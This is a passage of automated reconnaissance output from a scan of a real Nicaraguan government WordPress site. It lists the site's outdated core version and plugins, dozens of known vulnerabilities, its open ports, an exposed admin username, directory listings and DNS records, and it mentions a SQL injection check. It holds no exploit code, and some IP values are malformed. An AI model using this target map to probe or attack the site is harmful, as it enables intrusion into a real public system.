552. | Last updated: 2017-07-28T00:00:00.000Z
553. | Location: http://www.transitonacional.gob.ni/wp-content/themes/newsmag/
554. | Readme: http://www.transitonacional.gob.ni/wp-content/themes/newsmag/readme.txt
555. | Changelog: http://www.transitonacional.gob.ni/wp-content/themes/newsmag/changelog.txt
556. | Style URL: http://www.transitonacional.gob.ni/wp-content/themes/newsmag/style.css
557.  
558. [+] Enumerating plugins from passive detection ...
559. | 6 plugins found:
560.  
561. [+] Name: contact-form-7
562. | Latest version: 5.0.3
563. | Last updated: 2018-07-12T12:37:00.000Z
564. | Location: http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/
565. | Readme: http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/readme.txt
566. | Changelog: http://www.transitonacional.gob.ni/wp-content/plugins/contact-form-7/changelog.txt
567.  
568. [!] We could not determine the version installed. All of the past known vulnerabilities will be output to allow you to do your own manual investigation.
569.  
570. [!] Title: Contact Form 7 <= 3.7.1 - Security Bypass
571. Reference: https://wpvulndb.com/vulnerabilities/7020
572. Reference: http://www.securityfocus.com/bid/66381/
573. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2265
574. [i] Fixed in: 3.7.2
575.  
576. [!] Title: Contact Form 7 <= 3.5.2 - File Upload Remote Code Execution
577. Reference: https://wpvulndb.com/vulnerabilities/7022
578. Reference: http://packetstormsecurity.com/files/124154/
579. [i] Fixed in: 3.5.3
580.  
581. [+] Name: easy-collapse-accordion
582. | Latest version: 1.0
583. | Last updated: 2013-12-26T00:50:00.000Z
584. | Location: http://www.transitonacional.gob.ni/wp-content/plugins/easy-collapse-accordion/
585. | Readme: http://www.transitonacional.gob.ni/wp-content/plugins/easy-collapse-accordion/readme.txt
586. | Changelog: http://www.transitonacional.gob.ni/wp-content/plugins/easy-collapse-accordion/changelog.txt
587.  
588. [+] Name: itro-popup
589. | Latest version: 5.0.2
590. | Last updated: 2017-07-02T08:03:00.000Z
591. | Location: http://www.transitonacional.gob.ni/wp-content/plugins/itro-popup/
592. | Readme: http://www.transitonacional.gob.ni/wp-content/plugins/itro-popup/readme.txt
593. | Changelog: http://www.transitonacional.gob.ni/wp-content/plugins/itro-popup/changelog.txt
594.  
595. [+] Name: meteor-slides
596. | Latest version: 1.5.6
597. | Last updated: 2017-06-09T20:39:00.000Z
598. | Location: http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides/
599. | Readme: http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides/readme.txt
600. | Changelog: http://www.transitonacional.gob.ni/wp-content/plugins/meteor-slides/changelog.txt
601.  
602. [+] Name: transito_grafico
603. | Location: http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/
604. | Readme: http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/readme.txt
605. | Changelog: http://www.transitonacional.gob.ni/wp-content/plugins/transito_grafico/changelog.txt
606.  
607. [+] Name: wp-super-cache
608. | Latest version: 1.6.2
609. | Last updated: 2018-06-19T09:49:00.000Z
610. | Location: http://www.transitonacional.gob.ni/wp-content/plugins/wp-super-cache/
611. | Readme: http://www.transitonacional.gob.ni/wp-content/plugins/wp-super-cache/readme.txt
612. | Changelog: http://www.transitonacional.gob.ni/wp-content/plugins/wp-super-cache/changelog.txt
613.  
614. [!] We could not determine the version installed. All of the past known vulnerabilities will be output to allow you to do your own manual investigation.
615.  
616. [!] Title: WP-Super-Cache 1.3 - Remote Code Execution
617. Reference: https://wpvulndb.com/vulnerabilities/6623
618. Reference: http://www.acunetix.com/blog/web-security-zone/wp-plugins-remote-code-execution/
619. Reference: http://wordpress.org/support/topic/pwn3d
620. Reference: http://blog.sucuri.net/2013/04/update-wp-super-cache-and-w3tc-immediately-remote-code-execution-vulnerability-disclosed.html
621. [i] Fixed in: 1.3.1
622.  
623. [!] Title: WP Super Cache 1.3 - trunk/wp-cache.php wp_nonce_url Function URI XSS
624. Reference: https://wpvulndb.com/vulnerabilities/6624
625. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
626. [i] Fixed in: 1.3.1
627.  
628. [!] Title: WP Super Cache 1.3 - trunk/plugins/wptouch.php URI XSS
629. Reference: https://wpvulndb.com/vulnerabilities/6625
630. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
631. [i] Fixed in: 1.3.1
632.  
633. [!] Title: WP Super Cache 1.3 - trunk/plugins/searchengine.php URI XSS
634. Reference: https://wpvulndb.com/vulnerabilities/6626
635. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
636. [i] Fixed in: 1.3.1
637.  
638. [!] Title: WP Super Cache 1.3 - trunk/plugins/domain-mapping.php URI XSS
639. Reference: https://wpvulndb.com/vulnerabilities/6627
640. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
641. [i] Fixed in: 1.3.1
642.  
643. [!] Title: WP Super Cache 1.3 - trunk/plugins/badbehaviour.php URI XSS
644. Reference: https://wpvulndb.com/vulnerabilities/6628
645. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
646. [i] Fixed in: 1.3.1
647.  
648. [!] Title: WP Super Cache 1.3 - trunk/plugins/awaitingmoderation.php URI XSS
649. Reference: https://wpvulndb.com/vulnerabilities/6629
650. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
651. [i] Fixed in: 1.3.1
652.  
653. [!] Title: WP Super Cache <= 1.4.2 - Stored Cross-Site Scripting (XSS)
654. Reference: https://wpvulndb.com/vulnerabilities/7889
655. Reference: http://blog.sucuri.net/2015/04/security-advisory-persistent-xss-in-wp-super-cache.html
656. [i] Fixed in: 1.4.3
657.  
658. [!] Title: WP Super Cache <= 1.4.4 - Cross-Site Scripting (XSS)
659. Reference: https://wpvulndb.com/vulnerabilities/8197
660. Reference: http://z9.io/2015/09/25/wp-super-cache-1-4-5/
661. [i] Fixed in: 1.4.5
662.  
663. [!] Title: WP Super Cache <= 1.4.4 - PHP Object Injection
664. Reference: https://wpvulndb.com/vulnerabilities/8198
665. Reference: http://z9.io/2015/09/25/wp-super-cache-1-4-5/
666. [i] Fixed in: 1.4.5
667.  
668. [+] Finished: Wed Aug 8 10:57:20 2018
669. [+] Elapsed time: 00:21:43
670. [+] Requests made: 416
671. [+] Memory used: 103.109 MB
672. [+] Honeypot Probabilty: 30%
673. ---------------------------------------------------------------------------------------------------------------------------------------
674. [~] Trying to gather whois information for www.transitonacional.gob.ni
675. [+] Whois information found
676. [-] Unable to build response, visit https://who.is/whois/www.transitonacional.gob.ni
677. ---------------------------------------------------------------------------------------------------------------------------------------
678. [+] Robots.txt retrieved
679.  
680. ---------------------------------------------------------------------------------------------------------------------------------------
681. PORT STATE SERVICE
682. 21/tcp open ftp
683. 22/tcp open ssh
684. 23/tcp filtered telnet
685. 80/tcp open http
686. 110/tcp open pop3
687. 143/tcp open imap
688. 443/tcp open https
689. 3389/tcp filtered ms-wbt-server
690. Nmap done: 1 IP address (1 host up) scanned in 1.57 seconds
691. ---------------------------------------------------------------------------------------------------------------------------------------
692.  
693. [+] DNS Records
694. ns1.rhostbh.com. (162.159.24.66) AS13335 Cloudflare Inc United States
695. ns2.rhostbh.com. (162.159.25.91) AS13335 Cloudflare Inc United States
696.  
697. [+] MX Records
698. 0 (50.87.39.915) AS46606 Unified Layer United States
699.  
700. [+] Host Records (A)
701. www.transitonacional.gob.niHTTP: (50-87-39-91.unifiedlayer.com) (50.87.39.915) AS46606 Unified Layer United States
702.  
703. [+] TXT Records
704. "v=spf1 a mx ptr include:rhostbh.com ?all"
705.  
706. [+] DNS Map: https://dnsdumpster.com/static/map/transitonacional.gob.ni.png
707.  
708. [>] Initiating 3 intel modules
709. [>] Loading Alpha module (1/3)
710. [>] Beta module deployed (2/3)
711. [>] Gamma module initiated (3/3)
712. No emails found
713. No hosts found
714. [+] Virtual hosts:
715. ---------------------------------------------------------------------------------------------------------------------------------------
716. [~] Crawling the target for fuzzable URLs
717. [+] Found 8 fuzzable URLs
718. http://www.transitonacional.gob.ni//?page_id=864
719. [~] Using SQLMap api to check for SQL injection vulnerabilities. Don't worry we are using an online service and it doesn't depend on your internet connection. This scan will take 2-3 minutes.
720. #######################################################################################################################################
721. [i] The remote host tried to redirect to: http://www.transitonacional.gob.ni/
722. [?] Do you want follow the redirection ? [Y]es [N]o [A]bort, default: [N] >Y
723. [+] URL: http://www.transitonacional.gob.ni/
724. [+] Started: Wed Aug 8 10:08:01 2018
725.  
726. [+] Interesting header: SERVER: nginx/1.14.0
727. [+] Interesting header: WP-SUPER-CACHE: Served supercache file from PHP
728. [+] Interesting header: X-POWERED-BY: PHP/5.2.17
729. [+] robots.txt available under: http://www.transitonacional.gob.ni/robots.txt [HTTP 200]
730. [+] XML-RPC Interface available under: http://www.transitonacional.gob.ni/xmlrpc.php [HTTP 405]
731. [+] API exposed: http://www.transitonacional.gob.ni/wp-json/ [HTTP 200]
732. [+] Found an RSS Feed: http://www.transitonacional.gob.ni/feed [HTTP 200]
733. [!] Detected 1 user from RSS feed:
734. +-------+
735. | Name |
736. +-------+
737. | admin |
738. +-------+
739. [!] Full Path Disclosure (FPD) in 'http://www.transitonacional.gob.ni/wp-includes/rss-functions.php':
740. [!] Upload directory has directory listing enabled: http://www.transitonacional.gob.ni/wp-content/uploads/
741. [!] Includes directory has directory listing enabled: http://www.transitonacional.gob.ni/wp-includes/
742.  
743. [+] Enumerating WordPress version ...
744. [!] The WordPress 'http://www.transitonacional.gob.ni/readme.html' file exists exposing a version number
745.  
746. [+] WordPress version 4.4.2 (Released on 2016-02-02) identified from advanced fingerprinting, readme, stylesheets numbers
747. [!] 47 vulnerabilities identified from the version number
748.  
749. [!] Title: WordPress <= 4.4.2 - SSRF Bypass using Octal & Hexedecimal IP addresses
750. Reference: https://wpvulndb.com/vulnerabilities/8473
751. Reference: https://codex.wordpress.org/Version_4.5
752. Reference: https://github.com/WordPress/WordPress/commit/af9f0520875eda686fd13a427fd3914d7aded049
753. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4029
754. [i] Fixed in: 4.5
755.  
756. [!] Title: WordPress <= 4.4.2 - Reflected XSS in Network Settings
757. Reference: https://wpvulndb.com/vulnerabilities/8474
758. Reference: https://codex.wordpress.org/Version_4.5
759. Reference: https://github.com/WordPress/WordPress/commit/cb2b3ed3c7d68f6505bfb5c90257e6aaa3e5fcb9
760. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6634
761. [i] Fixed in: 4.5
762.  
763. [!] Title: WordPress <= 4.4.2 - Script Compression Option CSRF
764. Reference: https://wpvulndb.com/vulnerabilities/8475
765. Reference: https://codex.wordpress.org/Version_4.5
766. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6635
767. [i] Fixed in: 4.5
768.  
769. [!] Title: WordPress 4.2-4.5.1 - MediaElement.js Reflected Cross-Site Scripting (XSS)
770. Reference: https://wpvulndb.com/vulnerabilities/8488
771. Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
772. Reference: https://github.com/WordPress/WordPress/commit/a493dc0ab5819c8b831173185f1334b7c3e02e36
773. Reference: https://gist.github.com/cure53/df34ea68c26441f3ae98f821ba1feb9c
774. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4567
775. [i] Fixed in: 4.5.2
776.  
777. [!] Title: WordPress <= 4.5.1 - Pupload Same Origin Method Execution (SOME)
778. Reference: https://wpvulndb.com/vulnerabilities/8489
779. Reference: https://wordpress.org/news/2016/05/wordpress-4-5-2/
780. Reference: https://github.com/WordPress/WordPress/commit/c33e975f46a18f5ad611cf7e7c24398948cecef8
781. Reference: https://gist.github.com/cure53/09a81530a44f6b8173f545accc9ed07e
782. Reference: http://avlidienbrunn.com/wp_some_loader.php
783. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4566
784. [i] Fixed in: 4.4.3
785.  
786. [!] Title: WordPress 4.2-4.5.2 - Authenticated Attachment Name Stored XSS
787. Reference: https://wpvulndb.com/vulnerabilities/8518
788. Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
789. Reference: https://github.com/WordPress/WordPress/commit/4372cdf45d0f49c74bbd4d60db7281de83e32648
790. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5833
791. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5834
792. [i] Fixed in: 4.4.4
793.  
794. [!] Title: WordPress 3.6-4.5.2 - Authenticated Revision History Information Disclosure
795. Reference: https://wpvulndb.com/vulnerabilities/8519
796. Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
797. Reference: https://github.com/WordPress/WordPress/commit/a2904cc3092c391ac7027bc87f7806953d1a25a1
798. Reference: https://www.wordfence.com/blog/2016/06/wordpress-core-vulnerability-bypass-password-protected-posts/
799. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5835
800. [i] Fixed in: 4.4.4
801.  
802. [!] Title: WordPress 2.6.0-4.5.2 - Unauthorized Category Removal from Post
803. Reference: https://wpvulndb.com/vulnerabilities/8520
804. Reference: https://wordpress.org/news/2016/06/wordpress-4-5-3/
805. Reference: https://github.com/WordPress/WordPress/commit/6d05c7521baa980c4efec411feca5e7fab6f307c
806. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5837
807. [i] Fixed in: 4.4.4
808.  
809. [!] Title: WordPress 2.5-4.6 - Authenticated Stored Cross-Site Scripting via Image Filename
810. Reference: https://wpvulndb.com/vulnerabilities/8615
811. Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
812. Reference: https://github.com/WordPress/WordPress/commit/c9e60dab176635d4bfaaf431c0ea891e4726d6e0
813. Reference: https://sumofpwn.nl/advisory/2016/persistent_cross_site_scripting_vulnerability_in_wordpress_due_to_unsafe_processing_of_file_names.html
814. Reference: http://seclists.org/fulldisclosure/2016/Sep/6
815. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7168
816. [i] Fixed in: 4.4.5
817.  
818. [!] Title: WordPress 2.8-4.6 - Path Traversal in Upgrade Package Uploader
819. Reference: https://wpvulndb.com/vulnerabilities/8616
820. Reference: https://wordpress.org/news/2016/09/wordpress-4-6-1-security-and-maintenance-release/
821. Reference: https://github.com/WordPress/WordPress/commit/54720a14d85bc1197ded7cb09bd3ea790caa0b6e
822. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7169
823. [i] Fixed in: 4.4.5
824.  
825. [!] Title: WordPress 4.3-4.7 - Remote Code Execution (RCE) in PHPMailer
826. Reference: https://wpvulndb.com/vulnerabilities/8714
827. Reference: https://www.wordfence.com/blog/2016/12/phpmailer-vulnerability/
828. Reference: https://github.com/PHPMailer/PHPMailer/wiki/About-the-CVE-2016-10033-and-CVE-2016-10045-vulnerabilities
829. Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
830. Reference: https://github.com/WordPress/WordPress/commit/24767c76d359231642b0ab48437b64e8c6c7f491
831. Reference: http://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
832. Reference: https://www.rapid7.com/db/modules/exploit/unix/webapp/wp_phpmailer_host_header
833. [i] Fixed in: 4.4.6
834.  
835. [!] Title: WordPress 2.9-4.7 - Authenticated Cross-Site scripting (XSS) in update-core.php
836. Reference: https://wpvulndb.com/vulnerabilities/8716
837. Reference: https://github.com/WordPress/WordPress/blob/c9ea1de1441bb3bda133bf72d513ca9de66566c2/wp-admin/update-core.php
838. Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
839. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5488
840. [i] Fixed in: 4.4.6
841.  
842. [!] Title: WordPress 3.4-4.7 - Stored Cross-Site Scripting (XSS) via Theme Name fallback
843. Reference: https://wpvulndb.com/vulnerabilities/8718
844. Reference: https://www.mehmetince.net/low-severity-wordpress/
845. Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
846. Reference: https://github.com/WordPress/WordPress/commit/ce7fb2934dd111e6353784852de8aea2a938b359
847. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5490
848. [i] Fixed in: 4.4.6
849.  
850. [!] Title: WordPress <= 4.7 - Post via Email Checks mail.example.com by Default
851. Reference: https://wpvulndb.com/vulnerabilities/8719
852. Reference: https://github.com/WordPress/WordPress/commit/061e8788814ac87706d8b95688df276fe3c8596a
853. Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
854. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5491
855. [i] Fixed in: 4.4.6
856.  
857. [!] Title: WordPress 2.8-4.7 - Accessibility Mode Cross-Site Request Forgery (CSRF)
858. Reference: https://wpvulndb.com/vulnerabilities/8720
859. Reference: https://github.com/WordPress/WordPress/commit/03e5c0314aeffe6b27f4b98fef842bf0fb00c733
860. Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
861. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5492
862. [i] Fixed in: 4.4.6
863.  
864. [!] Title: WordPress 3.0-4.7 - Cryptographically Weak Pseudo-Random Number Generator (PRNG)
865. Reference: https://wpvulndb.com/vulnerabilities/8721
866. Reference: https://github.com/WordPress/WordPress/commit/cea9e2dc62abf777e06b12ec4ad9d1aaa49b29f4
867. Reference: https://wordpress.org/news/2017/01/wordpress-4-7-1-security-and-maintenance-release/
868. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5493
869. [i] Fixed in: 4.4.6
870.  
871. [!] Title: WordPress 4.2.0-4.7.1 - Press This UI Available to Unauthorised Users
872. Reference: https://wpvulndb.com/vulnerabilities/8729
873. Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
874. Reference: https://github.com/WordPress/WordPress/commit/21264a31e0849e6ff793a06a17de877dd88ea454
875. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5610
876. [i] Fixed in: 4.4.7
877.  
878. [!] Title: WordPress 3.5-4.7.1 - WP_Query SQL Injection
879. Reference: https://wpvulndb.com/vulnerabilities/8730
880. Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
881. Reference: https://github.com/WordPress/WordPress/commit/85384297a60900004e27e417eac56d24267054cb
882. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5611
883. [i] Fixed in: 4.4.7
884.  
885. [!] Title: WordPress 4.3.0-4.7.1 - Cross-Site Scripting (XSS) in posts list table
886. Reference: https://wpvulndb.com/vulnerabilities/8731
887. Reference: https://wordpress.org/news/2017/01/wordpress-4-7-2-security-release/
888. Reference: https://github.com/WordPress/WordPress/commit/4482f9207027de8f36630737ae085110896ea849
889. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5612
890. [i] Fixed in: 4.4.7
891.  
892. [!] Title: WordPress 3.6.0-4.7.2 - Authenticated Cross-Site Scripting (XSS) via Media File Metadata
893. Reference: https://wpvulndb.com/vulnerabilities/8765
894. Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
895. Reference: https://github.com/WordPress/WordPress/commit/28f838ca3ee205b6f39cd2bf23eb4e5f52796bd7
896. Reference: https://sumofpwn.nl/advisory/2016/wordpress_audio_playlist_functionality_is_affected_by_cross_site_scripting.html
897. Reference: http://seclists.org/oss-sec/2017/q1/563
898. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6814
899. [i] Fixed in: 4.4.8
900.  
901. [!] Title: WordPress 2.8.1-4.7.2 - Control Characters in Redirect URL Validation
902. Reference: https://wpvulndb.com/vulnerabilities/8766
903. Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
904. Reference: https://github.com/WordPress/WordPress/commit/288cd469396cfe7055972b457eb589cea51ce40e
905. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6815
906. [i] Fixed in: 4.4.8
907.  
908. [!] Title: WordPress 4.0-4.7.2 - Authenticated Stored Cross-Site Scripting (XSS) in YouTube URL Embeds
909. Reference: https://wpvulndb.com/vulnerabilities/8768
910. Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
911. Reference: https://github.com/WordPress/WordPress/commit/419c8d97ce8df7d5004ee0b566bc5e095f0a6ca8
912. Reference: https://blog.sucuri.net/2017/03/stored-xss-in-wordpress-core.html
913. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6817
914. [i] Fixed in: 4.4.8
915.  
916. [!] Title: WordPress 4.2-4.7.2 - Press This CSRF DoS
917. Reference: https://wpvulndb.com/vulnerabilities/8770
918. Reference: https://wordpress.org/news/2017/03/wordpress-4-7-3-security-and-maintenance-release/
919. Reference: https://github.com/WordPress/WordPress/commit/263831a72d08556bc2f3a328673d95301a152829
920. Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_press_this_function_allows_dos.html
921. Reference: http://seclists.org/oss-sec/2017/q1/562
922. Reference: https://hackerone.com/reports/153093
923. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6819
924. [i] Fixed in: 4.4.8
925.  
926. [!] Title: WordPress 2.3-4.8.3 - Host Header Injection in Password Reset
927. Reference: https://wpvulndb.com/vulnerabilities/8807
928. Reference: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html
929. Reference: http://blog.dewhurstsecurity.com/2017/05/04/exploitbox-wordpress-security-advisories.html
930. Reference: https://core.trac.wordpress.org/ticket/25239
931. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8295
932.  
933. [!] Title: WordPress 2.7.0-4.7.4 - Insufficient Redirect Validation
934. Reference: https://wpvulndb.com/vulnerabilities/8815
935. Reference: https://github.com/WordPress/WordPress/commit/76d77e927bb4d0f87c7262a50e28d84e01fd2b11
936. Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
937. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9066
938. [i] Fixed in: 4.4.10
939.  
940. [!] Title: WordPress 2.5.0-4.7.4 - Post Meta Data Values Improper Handling in XML-RPC
941. Reference: https://wpvulndb.com/vulnerabilities/8816
942. Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
943. Reference: https://github.com/WordPress/WordPress/commit/3d95e3ae816f4d7c638f40d3e936a4be19724381
944. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9062
945. [i] Fixed in: 4.4.10
946.  
947. [!] Title: WordPress 3.4.0-4.7.4 - XML-RPC Post Meta Data Lack of Capability Checks
948. Reference: https://wpvulndb.com/vulnerabilities/8817
949. Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
950. Reference: https://github.com/WordPress/WordPress/commit/e88a48a066ab2200ce3091b131d43e2fab2460a4
951. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9065
952. [i] Fixed in: 4.4.10
953.  
954. [!] Title: WordPress 2.5.0-4.7.4 - Filesystem Credentials Dialog CSRF
955. Reference: https://wpvulndb.com/vulnerabilities/8818
956. Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
957. Reference: https://github.com/WordPress/WordPress/commit/38347d7c580be4cdd8476e4bbc653d5c79ed9b67
958. Reference: https://sumofpwn.nl/advisory/2016/cross_site_request_forgery_in_wordpress_connection_information.html
959. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9064
960. [i] Fixed in: 4.4.10
961.  
962. [!] Title: WordPress 3.3-4.7.4 - Large File Upload Error XSS
963. Reference: https://wpvulndb.com/vulnerabilities/8819
964. Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
965. Reference: https://github.com/WordPress/WordPress/commit/8c7ea71edbbffca5d9766b7bea7c7f3722ffafa6
966. Reference: https://hackerone.com/reports/203515
967. Reference: https://hackerone.com/reports/203515
968. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9061
969. [i] Fixed in: 4.4.10
970.  
971. [!] Title: WordPress 3.4.0-4.7.4 - Customizer XSS & CSRF
972. Reference: https://wpvulndb.com/vulnerabilities/8820
973. Reference: https://wordpress.org/news/2017/05/wordpress-4-7-5/
974. Reference: https://github.com/WordPress/WordPress/commit/3d10fef22d788f29aed745b0f5ff6f6baea69af3
975. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9063
976. [i] Fixed in: 4.4.10
977.  
978. [!] Title: WordPress 2.3.0-4.8.1 - $wpdb->prepare() potential SQL Injection
979. Reference: https://wpvulndb.com/vulnerabilities/8905
980. Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
981. Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
982. Reference: https://github.com/WordPress/WordPress/commit/fc930d3daed1c3acef010d04acc2c5de93cd18ec
983. [i] Fixed in: 4.4.11
984.  
985. [!] Title: WordPress 2.3.0-4.7.4 - Authenticated SQL injection
986. Reference: https://wpvulndb.com/vulnerabilities/8906
987. Reference: https://medium.com/websec/wordpress-sqli-bbb2afcc8e94
988. Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
989. Reference: https://github.com/WordPress/WordPress/commit/70b21279098fc973eae803693c0705a548128e48
990. Reference: https://wpvulndb.com/vulnerabilities/8905
991. [i] Fixed in: 4.7.5
992.  
993. [!] Title: WordPress 2.9.2-4.8.1 - Open Redirect
994. Reference: https://wpvulndb.com/vulnerabilities/8910
995. Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
996. Reference: https://core.trac.wordpress.org/changeset/41398
997. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14725
998. [i] Fixed in: 4.4.11
999.  
1000. [!] Title: WordPress 3.0-4.8.1 - Path Traversal in Unzipping
1001. Reference: https://wpvulndb.com/vulnerabilities/8911
1002. Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
1003. Reference: https://core.trac.wordpress.org/changeset/41457
1004. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14719
1005. [i] Fixed in: 4.4.11
1006.  
1007. [!] Title: WordPress 4.4-4.8.1 - Cross-Site Scripting (XSS) in oEmbed
1008. Reference: https://wpvulndb.com/vulnerabilities/8913
1009. Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
1010. Reference: https://core.trac.wordpress.org/changeset/41448
1011. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14724
1012. [i] Fixed in: 4.4.11
1013.  
1014. [!] Title: WordPress 4.2.3-4.8.1 - Authenticated Cross-Site Scripting (XSS) in Visual Editor
1015. Reference: https://wpvulndb.com/vulnerabilities/8914
1016. Reference: https://wordpress.org/news/2017/09/wordpress-4-8-2-security-and-maintenance-release/
1017. Reference: https://core.trac.wordpress.org/changeset/41395
1018. Reference: https://blog.sucuri.net/2017/09/stored-cross-site-scripting-vulnerability-in-wordpress-4-8-1.html
1019. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-14726
1020. [i] Fixed in: 4.4.11
1021.  
1022. [!] Title: WordPress <= 4.8.2 - $wpdb->prepare() Weakness
1023. Reference: https://wpvulndb.com/vulnerabilities/8941
1024. Reference: https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/
1025. Reference: https://github.com/WordPress/WordPress/commit/a2693fd8602e3263b5925b9d799ddd577202167d
1026. Reference: https://twitter.com/ircmaxell/status/923662170092638208
1027. Reference: https://blog.ircmaxell.com/2017/10/disclosure-wordpress-wpdb-sql-injection-technical.html
1028. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-16510
1029. [i] Fixed in: 4.4.12
1030.  
1031. [!] Title: WordPress 2.8.6-4.9 - Authenticated JavaScript File Upload
1032. Reference: https://wpvulndb.com/vulnerabilities/8966
1033. Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
1034. Reference: https://github.com/WordPress/WordPress/commit/67d03a98c2cae5f41843c897f206adde299b0509
1035. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17092
1036. [i] Fixed in: 4.4.13
1037.  
1038. [!] Title: WordPress 1.5.0-4.9 - RSS and Atom Feed Escaping
1039. Reference: https://wpvulndb.com/vulnerabilities/8967
1040. Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
1041. Reference: https://github.com/WordPress/WordPress/commit/f1de7e42df29395c3314bf85bff3d1f4f90541de
1042. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17094
1043. [i] Fixed in: 4.4.13
1044.  
1045. [!] Title: WordPress 4.3.0-4.9 - HTML Language Attribute Escaping
1046. Reference: https://wpvulndb.com/vulnerabilities/8968
1047. Reference: https://wordpress.org/news/2017/11/wordpress-4-9-1-security-and-maintenance-release/
1048. Reference: https://github.com/WordPress/WordPress/commit/3713ac5ebc90fb2011e98dfd691420f43da6c09a
1049. Reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-17093
1050. [i] Fixed in: 4.4.13
1051.  
